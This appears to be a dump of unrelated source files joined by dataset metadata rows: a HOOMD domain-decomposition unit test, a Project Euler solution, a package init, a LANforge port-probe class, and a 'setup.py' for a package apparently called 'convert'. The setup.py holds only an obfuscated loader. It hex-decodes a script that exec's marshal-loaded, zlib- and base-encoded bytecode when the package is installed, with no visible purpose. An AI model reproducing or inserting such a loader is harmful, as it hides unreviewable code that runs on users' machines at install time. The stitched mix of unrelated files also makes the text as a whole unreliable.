self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# explicitly set the grid dimensions in the constructor
comm.decomposition(nx=2, ny=2, nz=2)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# shuffle dimensions
comm.decomposition(nx=2, ny=4, nz=1)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 5)
self.assertEquals(len(dd.getCumulativeFractions(2)), 2)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[4], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 1.0)
# shuffle dimensions
comm.decomposition(nx=4, ny=1, nz=2)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 5)
self.assertEquals(len(dd.getCumulativeFractions(1)), 2)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[4], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 1.0)
# shuffle dimensions
comm.decomposition(nx=1, ny=2, nz=4)
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 2)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[1], 0.25)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[2], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[3], 0.75)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[4], 1.0)
## Test the fractions are set correctly
def test_basic_balance(self):
    """Check fractional domain decompositions along each axis.

    On a single rank no decomposition object is created.  On multiple
    ranks, the cumulative fractions reported by the C++ decomposition
    must match the requested splits along x, y, and z.
    """
    def check_axis(dd, axis, expected):
        # Compare the cumulative-fraction list on one axis element-wise.
        fractions = dd.getCumulativeFractions(axis)
        self.assertEqual(len(fractions), len(expected))
        for value, ref in zip(fractions, expected):
            self.assertAlmostEqual(value, ref)

    if comm.get_num_ranks() == 1:
        comm.decomposition(x=0.5)
        self.assertEqual(hoomd.context.current.decomposition, None)
    elif comm.get_num_ranks() > 1:
        box = data.boxdim(L=10)
        boxdim = box._getBoxDim()
        # a single fractional cut along z; x and y stay uniform halves
        comm.decomposition(z=0.2)
        dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
        check_axis(dd, 0, [0.0, 0.5, 1.0])
        check_axis(dd, 1, [0.0, 0.5, 1.0])
        check_axis(dd, 2, [0.0, 0.2, 1.0])
        # a fraction list along x and a single fraction along y
        comm.decomposition(x=[0.2, 0.3, 0.1], y=0.3)
        dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
        check_axis(dd, 0, [0.0, 0.2, 0.5, 0.6, 1.0])
        check_axis(dd, 1, [0.0, 0.3, 1.0])
        check_axis(dd, 2, [0.0, 1.0])
## Test that script gracefully chooses among available options
def test_overspecify(self):
    """Check precedence among fraction args, n* args, global options, and linear.

    For each axis: specifying both a fraction list and a uniform count is
    an error; an explicit n* argument overrides the global option; with no
    argument the global option is used.  Finally, the global ``linear``
    flag takes precedence over the global ``nz``.
    """
    if comm.get_num_ranks() > 1:
        box = data.boxdim(L=10)
        boxdim = box._getBoxDim()

        def check_axis(dd, axis, expected):
            # Compare the cumulative-fraction list on one axis element-wise.
            fractions = dd.getCumulativeFractions(axis)
            self.assertEqual(len(fractions), len(expected))
            for value, ref in zip(fractions, expected):
                self.assertAlmostEqual(value, ref)

        def uniform(n):
            # Cumulative fractions of a uniform n-way split: 0, 1/n, ..., 1.
            return [float(i) / n for i in range(n + 1)]

        for axis, name in enumerate(('x', 'y', 'z')):
            n_name = 'n' + name
            # it is wrong to set both a fraction list and a count, so it should fail
            with self.assertRaises(RuntimeError):
                comm.decomposition(**{name: [0.2, 0.3, 0.1], n_name: 2})
            # set a global value, and try with the n* argument set (the argument wins)
            setattr(hoomd.context.options, n_name, 8)
            comm.decomposition(**{n_name: 4})
            dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
            check_axis(dd, axis, uniform(4))
            # now fall back to the global one
            comm.decomposition()
            dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
            check_axis(dd, axis, uniform(8))
            # undo this so that it doesn't contaminate other dimensions
            setattr(hoomd.context.options, n_name, None)

        # the linear command should take precedence over the nz option
        hoomd.context.options.nz = 4
        hoomd.context.options.linear = True
        comm.decomposition()
        dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
        check_axis(dd, 2, uniform(8))
        # clear out these options so they don't contaminate other tests
        hoomd.context.options.nz = None
        hoomd.context.options.linear = None
## Test that balancing fails after initialization
def test_wrong_order(self):
    """Requesting a decomposition after the system is initialized must fail."""
    # target a packing fraction of 0.05
    init.create_lattice(lattice.sc(a=2.1878096788957757), n=[5, 5, 4])
    with self.assertRaises(RuntimeError):
        comm.decomposition(y=0.3)
    # reset so later tests start from a clean context
    context.initialize()
## Test that errors are raised if fractional divisions exceed 1.0
def test_bad_fractions(self):
    """Negative fractions, fractions > 1, and lists summing past 1.0 must fail.

    The same four invalid inputs are exercised on each axis; the error may
    surface either in ``comm.decomposition`` or when the C++ object is built.
    """
    if comm.get_num_ranks() > 1:
        box = data.boxdim(L=10)
        boxdim = box._getBoxDim()
        bad_values = (-0.2, 1.2, [0.2, 0.9], [0.3, -0.1])
        for axis in ('x', 'y', 'z'):
            for bad in bad_values:
                with self.assertRaises(RuntimeError):
                    comm.decomposition(**{axis: bad})
                    hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
## Test that parameters are set correctly
def test_set_params(self):
    """Check that ``set_params`` toggles uniform/non-uniform state per axis."""
    if comm.get_num_ranks() > 1:
        def check_uniform(axis, n):
            # A uniform axis stores only its slice count.
            current = hoomd.context.current.decomposition
            self.assertTrue(getattr(current, 'uniform_' + axis))
            self.assertEqual(getattr(current, 'n' + axis), n)

        def check_fractions(axis, fractions):
            # A non-uniform axis stores the explicit fraction list.
            current = hoomd.context.current.decomposition
            self.assertFalse(getattr(current, 'uniform_' + axis))
            stored = getattr(current, axis)
            for i, f in enumerate(fractions):
                self.assertAlmostEqual(stored[i], f)

        dd = comm.decomposition(x=[0.3], y=[0.4], z=[0.6])
        # check that the grid was set correctly in the constructor (via set_params)
        check_fractions('x', [0.3])
        check_fractions('y', [0.4])
        check_fractions('z', [0.6])
        # switch everything to a uniform grid (doesn't matter that it is infeasible,
        # we aren't actually constructing it)
        dd.set_params(nx=4)
        dd.set_params(ny=5)
        dd.set_params(nz=6)
        check_uniform('x', 4)
        check_uniform('y', 5)
        check_uniform('z', 6)
        # do it all in one function call to make sure this works
        dd.set_params(nx=2, ny=3, nz=4)
        check_uniform('x', 2)
        check_uniform('y', 3)
        check_uniform('z', 4)
        # now back to a new non-uniform spacing
        dd.set_params(x=0.6)
        dd.set_params(y=0.4)
        dd.set_params(z=0.3)
        check_fractions('x', [0.6])
        check_fractions('y', [0.4])
        check_fractions('z', [0.3])
        # do it all at once
        dd.set_params(x=[0.2, 0.3], y=[0.4, 0.1], z=[0.25, 0.25])
        check_fractions('x', [0.2, 0.3])
        check_fractions('y', [0.4, 0.1])
        check_fractions('z', [0.25, 0.25])
        # try a mixture of things
        dd.set_params(nx=3, y=0.8, nz=2)
        check_uniform('x', 3)
        check_fractions('y', [0.8])
        check_uniform('z', 2)
        # setting a fraction and a count on the same axis must fail
        with self.assertRaises(RuntimeError):
            dd.set_params(x=0.2, nx=4)
        with self.assertRaises(RuntimeError):
            dd.set_params(y=0.2, ny=4)
        with self.assertRaises(RuntimeError):
            dd.set_params(z=0.2, nz=4)
## Test for MPI barriers
class barrier_tests(unittest.TestCase):
    """Smoke tests: the MPI barrier wrappers must run without raising."""

    def test_barrier(self):
        comm.barrier()

    def test_barrier_all(self):
        comm.barrier_all()
# Run the suite with verbose output when this file is executed directly.
if __name__ == '__main__':
    unittest.main(argv = ['test.py', '-v'])
| 51.888631
| 124
| 0.658693
| 2,548
| 22,364
| 5.722527
| 0.073783
| 0.240313
| 0.194225
| 0.372265
| 0.893492
| 0.876963
| 0.872094
| 0.787189
| 0.772238
| 0.75859
| 0
| 0.046627
| 0.225139
| 22,364
| 430
| 125
| 52.009302
| 0.794795
| 0.069755
| 0
| 0.644654
| 0
| 0
| 0.000819
| 0
| 0
| 0
| 0
| 0
| 0.644654
| 1
| 0.025157
| false
| 0
| 0.009434
| 0
| 0.040881
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b3b6bc98aaf3bce48ce704bbd0de730e4ffdaf00
| 9,730
|
py
|
Python
|
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
threat0/convert
|
1d1f1b73cd78b21e4e7b58b320c5a2ac553122c1
|
[
"Apache-2.0"
] | null | null | null |
# Script compilé par Faxel
# Twitter : https://twitter.com/faxelhs
import base64
from base64 import *
exec(base64.b16decode('232053637269707420636F6D70696CC3A92070617220466178656C0A232054776974746572203A2068747470733A2F2F747769747465722E636F6D2F666178656C68730A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732862275C7865335C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830385C7830305C7830305C783030405C7830305C7830305C78303073365C7830305C7830305C783030645C783030645C7830316C5C7830305A5C783030645C783030645C7830316C5C7830315A5C783031645C783030645C7830316C5C7830325A5C783032655C783033655C7830325C7861305C783034655C7830305C7861305C783035655C7830315C7861305C783036645C7830325C7861315C7830315C7861315C7830315C7861315C7830315C7838335C7830315C7830315C783030645C783031535C783030295C7830335C7865395C7830305C7830305C7830305C7830304E73505C7831305C7830305C78303050434F4C32574B334E374F4D4D46504753424F4334353556534C58564D33485A474A5553353556325747574E4C5758524957584F574E563636514A4357534D54584C454256414E5333594D345446455834523545514B585349494249464F515049574141424E5152323543564541334C5841454355494750375541374C5037414A4D413336425049564E50375A56445451324C364B55544C4C4E34555152484F5A534F4C5448425A4F504848505A574D4B4157534C355A58414B3733483448544453524351544442555357544A4955344753454D5A564D47464A5A3233494B42563233484C4F36514641494F5A493556525748524A4A54544F575933524A45494A363557484848554A524C4851534549364954344C4B49514157505936464B4854564A4A52554A4948453543574E534B574A4C5A5446344736595A4654324A504A4A525949565932554F574E59474444454F5741463542474733464D4D4947375A51334C44544D514E3551565747533333484C4D4D4E5657525657514F365233335041584D515636514F473347565A41333745584E4D4F355343483347434E5741375A465036424F57333333553655335244435735474C505836533452474B584F5343363750534E4E5A5043475354445149554E334B323435585758544B425536335A48323347374657494135345835505158564735524A524F35333455495934554A5A4250514B47553759484758353334554137444659323556584348554E324A354A4A504D4F564E46574E36515957544C5A524F425334474B4B47374
34B51474B5A4544345635494E35374959464D325653494E424F4C535944573741424A4C5346413248594C544D4D43345458504F4B42373556594435324134363536464F4E41585046333547454D4F57534E5947484C5A595A324A4E4F5052444C434C52554F4B544E4C59485852324E484E354F4950525352434D48534C554B5457374A4645365A4A4B424C554A495A4B5A594D5A46475142415055334649484A3732524E47324C5A4D57544E4C594B4E4B4C4B554C55585649484E475A584234474F374A37484F4E3555324544453445555A455A37484E484842504656534F4154354A5A54413341485A5A5436423346454A51564B564B43414E4651364E503750505634353736505446354E53494934354249375433454C51444B4A424B55474B58425A453536504536564B594655585732514B594645574A574C33424156484A354F365945333341335547564853564C5A32444B4958424E51594E4151425753374847413337465136434D33413741364333544E58414C5846584B4832435A4546353447335452335548564857564A564554475A424F4835455545484A414B5137354B36424F33334B454C4647535337514754555A52425953544C535356534E5953584552525057424146434F424A43574E4B564C44434A505A364E54345254535032475055564F3333534B37594C494B5648434935514E544D524C4C584F3734554B41514A45373741564146544148485046465959594A565843334948575451574D444D59563244444A574D5445584D4B35425A555A4447464F5A434F4C49544747554E475558364E5648355154484A54544D4B57364A4F493334324255484943374E46524556374B455A53595A54324E445937573250375A33504F424C504F354A334D4C3435504952545246515A4C343559545937375849595735584F4E375651534F334B324C50443657424853524C504A4F344F4D364935474455333254334C564A4257585A4D34474D3647424742354759484E50344E345635543748544453514C3252324147364C4636564F325754495034324B3337584A4D3343374B444A4E4947594C434841504A4D3642454A53424756334B474F51504B5836373454324245333652595542355A32335159485559334143544836514533445A5754455652354C3352334C524E4932594A56505256485251544C4656554F334C324A4849434F5833354259583633545A554B5044355A5057514C545447334B453554474E4A544D564C55334F415A4A43485158354950505733424546523357425A505359524C4B35584D46323653484337544B4E344F554F53464F444C5644594F444E51364F544C5552585735453736475A4454504A57494E535245514A4F545236413457594E5
84650423455373354353658534E3533493737363635374837515259574E4C33424C474B58355837325A524D565435434F564F545A4A51544A4A56534C344D51324F4D574B53554E4E584C3258544D4B5154475635564D4B584A4C4B52465753584A424F5445574A484B425033374B543543525544544A36413744494132494736594548354D4E4F413756575950365951544B59544E33494C58565A443337335045534333415947334A525A32564858344A5536344E4F36335335374E345943353544354533335847505743483553374533555433544759584633504A504F554F45465135334C58454C4F44564A3433454F4D52344A4A4A444C4E4734593644475A4E45573653374B485949555A554F58474354453757584F3246514D58594A374C3536574A364757573656414B4D32324A34464151464156565A424B4E54464E4642574257334E49543633514B414E434E544536585137564950513752485237433742435846344D4C3454524250534F4646344A4D4F4C5A56525537324C57504D4533334F4736375A3758514559355632484D324258414E434D4F4D47504F494F58565744443353533533494558333658333652424F3733335148334D4F424558364D57424652324E5252505A5854444E43553235594B5A4354594C32594E544D5A515844464A58523334485743504E35523332374956453636564357583758413753364E334F4B5A375641325A32335A32334A59425650564B4A44325A32365642545637544635523759514D48365649535235434E56514C4E534B5236424557423444574C575837534F4F3645334A5255365141444E483433433536424135483457415A4B564E564641424534594159444E57563234354E345734375233423647544A49325848434A5949484F4F4735423534414E4246595946443542374152534A5349374543374A444C55484A3233595642334D43555841434E4456484C55455A54523532545656435037454E4B4A4C34444C554148554C46505A503541465541473242583758424F4A4834473749344A32354C3659554F494A36564C3642434549365835374234465A454B474B584C4234565A4550345358344842574C58334C46475A34483358514D5A424B47583441595048335A5559495351424C4E37485634493549475A585A494B56575A554B53354B505356464C51434859354A414143424148374D42334F4F334E5A4C5A58524656584C5151585143564F47504F374132434A4E4D514A53443249485553444D513753414359425659445533583748514C5556324E3341374F493544333644594652584949524C4B35434F59524A4D36524935584854564853544253374C584348484C4E4F4E45375537475744584834574F4B344
A374D55505235474459455936544E374747364C55585342324252344758464D574D58443744424F415A53564350484D5A5A5A5055514A50554554564345555745524C3245553443494F544751344234364432474B5046494352443253364156564B47474E364C59424A365A42584545505257564853454C51504A4A36444D4532543357474142584D374136554244375A4549443737544552335A5A564555413634575259514C335548364B584C484B564F56435741424E4847354D565151333335495650535A35454D4356343248354D4C48574A5543474A4F35564333364247584F583657434E554B53523553475444365153454F34514E4C51574B51454759424A4450594C5041435344374E564C32494A414E373432414B3358495654414D4C5058354D505A374447344E5246514347414B474E493358434733344852544E464C334A374344534F334B4F3248564C594C4F4244444A3349343241504554474832324737435033475A36354C4E374C595258424E344B565943363250334A55375A5A494B365055375036363258574B4C36514D3243543650464634445A533342364A4944345248415A5551563451424C334B4753595455334A4E5946333445434B335637445035345A4858544454423744555452544B4C37514C5A364C425736364B3548514D555648454F43504D50424749485A4D443644505554565448354151454257574246503448453546595A4241345A56553450445849525753584F4E4F33524C554B534E4355485A4A57454A505A4435354B344F36564259425745445A45415551475435553535324F334C56444B43574E51424D573659555337574954434A344950465552455241344B424245364756544954374E344A414F45365856594E474642343452474436493253494C4B473445455453423232534D5737485834344F5159335548344E4E3749594750573355453553434C4B484C32574857443359474150504C59485057355745445147444D414159364253504955514948494B435746454956514A3749594A4C475053553245583758425434344B42333558433445465145485A554152364C5646485A4F4934374959594C474B564E564355485858555832424859464435374550454537445946585A4F44594547374C595441465137354E525256595835415058465A4D50485135354B344F414E545335445535325A4B494E494E584F5758564435414444344655364448514E4C4237484E47335941484E495643515A44344F44544B554748415149435244524349324447454D424E5A47424A514941534C595248423633494350345032495543575A5649484E5A554C57524532484F4847444335513536465A4832554F47425A5553475544574D53594
C4E443736414D34435750555134344E51364648354451365A425A494642455A4B4756364D4B4654433451365A46464C5A34435253584F593455505857593752424956505346434A5736594A5342454535555455344946534A4A4A52544E42464146335347563659464A3246515A4E455247434B3734425A465A4559354A4A47434954514D5745444C4D4C554F574E444A35504656574254365154534E3348473457474D33524F3545555435374950333436504C4D58443342344454544146454C4D3243543756355947334B4F5854324B5A35595233353348544D515745324232504E355550424F365751495A57494D474D4654475254484556374C564636454A425A524D4F324E51344941573450343433355733484937345033495841574D41583752444741364E55514F453642334E47324E354C594E585A4857424C3736564B48434F525537424D574632344843424F4B4D4A4244444A52334E4F33453648483459534750465850524C494F514342364E345737503449524333574F57474258464B5A425948494B4557515041585242583746554B5836353632544842573435594A554836455252454C58553634454237344C4A5247594C4A50545A4F573234443245344C5735535155583350594755484858594D5A425A584C584A4A37464C4F4E573458594D4F444D41584A57443559343642324B50434253354C5A355A334A41554549494B5446554A524B4D444B3443523655534B5A47554654555546474D4656474D524F584F584252594D4E58544C4E34594C50474333574636525834594C5A324D54474C3454373754445A464A553D3D3D3D3D3D295C7830375C7864615C7830347A6C69625C7864615C7830366261736536345C7864615C7830376D61727368616C5C7864615C783034657865635C7864615C7830356C6F6164735C7864615C6E6465636F6D70726573735C7864615C746233326465636F64655C7861395C783030725C745C7830305C7830305C783030725C745C7830305C7830305C7830305C7866615C7830333C723E5C7864615C7830383C6D6F64756C653E5C7830335C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7831385C783031272929'))
| 1,946
| 9,628
| 0.996814
| 18
| 9,730
| 538.833333
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.8772
| 0.001542
| 9,730
| 5
| 9,628
| 1,946
| 0.121153
| 0.006372
| 0
| 0
| 0
| 0
| 0.993379
| 0.993379
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
b3d30f2af623633cbe1b661773a447476d4f398b
| 101
|
py
|
Python
|
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
spatialclique/__init__.py
|
pjhartzell/spatial-clique
|
ecd7f95e182ee1e4f6ff7b47390a85500ec79815
|
[
"MIT"
] | null | null | null |
from .spatialclique import mc_hard, mc_soft
from .spatialclique import hard_adjacency, soft_adjacency
| 50.5
| 57
| 0.871287
| 14
| 101
| 6
| 0.5
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089109
| 101
| 2
| 57
| 50.5
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3ec5ad6dec0082400cde7690b71ea6bd995c520
| 2,845
|
py
|
Python
|
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t8.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
# The four adjacent digits in the 1000-digit number that have the greatest product are 9 x 9 x 8 x 9 = 5832.
#
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
# Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
def parse_data():
    """Return the Project Euler problem-8 1000-digit number as a list of ints.

    Each element is a single digit 0-9; surrounding whitespace/newlines in
    the literal are ignored.
    """
    number = """
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
"""
    # int(ch) replaces the original no-op `int(x) - int('0')`; filtering on
    # isdigit drops the embedded newlines without a replace() pass.
    return [int(ch) for ch in number if ch.isdigit()]
def get_greater_serial_product(numbers, serial):
    """Return the greatest product of ``serial`` adjacent elements of ``numbers``.

    Raises ValueError if ``numbers`` has fewer than ``serial`` elements.
    """
    # `range` instead of the Python-2-only `xrange` (same behavior on both).
    limit = len(numbers) - serial + 1
    best = None
    for start in range(limit):
        product = 1
        for value in numbers[start:start + serial]:
            product *= value
        if best is None or product > best:
            best = product
    if best is None:
        # The original max([]) would also raise ValueError here.
        raise ValueError("serial exceeds the length of numbers")
    return best
def main():
    """Solve Project Euler problem 8 and print the answer."""
    # The original parsed the data twice and left `data` unused; reuse it.
    data = parse_data()
    # print(...) is valid as both a Py2 statement and a Py3 call for one arg.
    print(get_greater_serial_product(data, 13))

if __name__ == '__main__':
    main()
| 40.642857
| 127
| 0.879086
| 159
| 2,845
| 15.597484
| 0.440252
| 0.017742
| 0.012903
| 0.015323
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0.854839
| 0
| 0.774713
| 0.082601
| 2,845
| 69
| 128
| 41.231884
| 0.175479
| 0.44007
| 0
| 0
| 0
| 0
| 0.657744
| 0.637349
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.027778
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
376ec68a5ad5a0129d4beb0c8cd24ff819030e95
| 138
|
py
|
Python
|
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
src/aioquic/asyncio/__init__.py
|
siliconcupcake/aioquic
|
86289665a8ee71dd930815de2f4e9db73a98f166
|
[
"BSD-3-Clause"
] | null | null | null |
from .quic.client import connect # noqa
from .quic.protocol import QuicConnectionProtocol # noqa
from .quic.server import serve # noqa
| 34.5
| 57
| 0.782609
| 18
| 138
| 6
| 0.555556
| 0.222222
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 138
| 3
| 58
| 46
| 0.923077
| 0.101449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
378a85cc5c9eb1b5c7dc732e153ed85a81a384dc
| 31,089
|
py
|
Python
|
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | 1
|
2020-12-10T18:46:54.000Z
|
2020-12-10T18:46:54.000Z
|
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-json/port_probe.py
|
MynaITLabs/lanforge-scripts
|
c905e2a12662f0e3304f0ac29b509c95f09983ce
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import importlib
from time import sleep
# import pandas as pd
import sys
import os
from pprint import pprint
sys.path.append(os.path.join(os.path.abspath(__file__ + "../../../")))
lfcli_base = importlib.import_module("py-json.LANforge.lfcli_base")
LFCliBase = lfcli_base.LFCliBase
# Probe data can change frequently. It is recommended to update
class ProbePort(LFCliBase):
def __init__(self,
             lfhost=None,
             lfport='8080',
             debug=False,
             eid_str=None):
    """Create a probe for one LANforge port.

    :param lfhost: LANforge JSON API host passed to LFCliBase.
    :param lfport: LANforge JSON API port (string, default '8080').
    :param debug: enable debug output in the base class.
    :param eid_str: entity id such as '1.1.sta0000'; the last two
